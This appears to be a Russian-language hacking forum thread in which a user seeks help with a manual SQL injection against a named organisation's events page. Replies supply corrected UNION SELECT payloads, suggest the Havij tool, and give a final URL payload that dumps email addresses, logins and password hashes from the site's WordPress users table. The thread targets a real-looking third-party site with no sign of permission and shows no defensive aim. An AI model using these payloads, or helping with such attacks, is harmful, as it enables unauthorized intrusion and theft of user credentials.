ПРивет всем. Есть вопрос по SQL. Может кто подскажет в чём моя ошибка? Буду благодарен))))) Беру сайт xhttp://www.ghra.org и начинаю ручной SQL xhttp://www.ghra.org/events.php?eventid=45 Вроде всё норма- пошёл. Но как толко я определил версию,количество столбцов и вбиваю команду на выдачи инфы по админу xhttp://www.ghra.org/events.php?eventid=45+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,group_concat(table_name),20,21,22+from+INFORMATION_SCHEMA.TABLES+--+ у меня вылетает хрень типа; Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/ghra/public_html/events.php on line 91 Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /home/ghra/public_html/events.php on line 95 Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /home/ghra/public_html/events.php on line 97 Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /home/ghra/public_html/events.php on line 99 Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /home/ghra/public_html/events.php on line 101 Почему. Может вбивать concat_ws(0x3a,user(),version(),database(),@@vers ion_compile_os)но и тогда фигня вылазит. Читал ачат внимательно вроде. Подскажите что не так. Такое у меня во всех скулях ручных. Насчёт кривых рук и пустой башки просьба не отвечать. Кто может подсказать прошу сюда, либо в пм.
в пятой искать надо и прописывай -45+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
пробовал в havij базу получил но таблицы неполучает начал подбором может че то и найдет ждать нестал попробуй прогой раскрутить какой нибудь
знатоки мля)) лорд у тебя плохие знания в мускуле)) скуля на лицо Dagger держи PHP: http://www.ghra.org/events.php?eventid=-45+union+select+1,2,3,4,group_concat(user_email,0x2F,user_login,0x2F,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users--
